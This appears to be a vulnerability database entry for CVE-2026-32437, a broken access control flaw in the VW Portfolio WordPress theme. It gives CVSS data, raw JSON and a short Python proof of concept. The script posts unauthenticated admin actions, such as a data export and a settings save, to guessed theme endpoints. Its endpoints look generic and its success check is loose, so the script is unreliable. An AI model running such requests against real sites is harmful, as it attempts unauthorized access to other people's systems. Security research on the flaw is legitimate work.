Security Vulnerability Report
中文
CVE-2026-32437 CVSS 5.3 MEDIUM

CVE-2026-32437

Published: 2026-03-13 19:55:04
Last Modified: 2026-04-29 10:17:10

Description

Missing Authorization vulnerability in vowelweb VW Portfolio vw-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Portfolio: from n/a through <= 1.3.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

VW Portfolio <= 1.3.3
vowelweb VW Portfolio all versions through n/a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32437 PoC - VW Portfolio Broken Access Control # Target: WordPress site with VW Portfolio theme <= 1.3.3 TARGET_URL = "http://target-wordpress-site.com" # Common vulnerable endpoints in VW Portfolio theme VULNERABLE_PATHS = [ "/wp-admin/admin-ajax.php", "/wp-content/themes/vw-portfolio/functions.php", "/wp-admin/admin.php?page=vw_portfolio_settings", ] def check_vulnerability(): """Check if target is vulnerable to CVE-2026-32437""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', } # Test unauthenticated access to protected functions test_payloads = [ # Example: Access admin functionality without authentication {'action': 'vw_portfolio_admin_action', 'do': 'export_data'}, # Example: Access settings without auth {'page': 'vw_portfolio', 'tab': 'settings', 'save': '1'}, ] for path in VULNERABLE_PATHS: url = f"{TARGET_URL}{path}" for payload in test_payloads: try: response = requests.post(url, data=payload, headers=headers, timeout=10) # Check for successful unauthorized access if response.status_code == 200: # Verify if sensitive data is exposed if 'admin' in response.text.lower() or 'settings' in response.text.lower(): print(f"[+] VULNERABLE: {url}") print(f"[+] Payload: {payload}") return True except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") print("[-] Target may not be vulnerable or not using affected theme") return False if __name__ == "__main__": print("CVE-2026-32437 VW Portfolio Exploitation Test") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32437", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:03.803", "lastModified": "2026-04-29T10:17:10.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vowelweb VW Portfolio vw-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Portfolio: from n/a through <= 1.3.3."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en vowelweb VW Portfolio vw-portfolio permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a VW Portfolio: desde n/a hasta &lt;= 1.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vw-portfolio/vulnerability/wordpress-vw-portfolio-theme-1-3-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}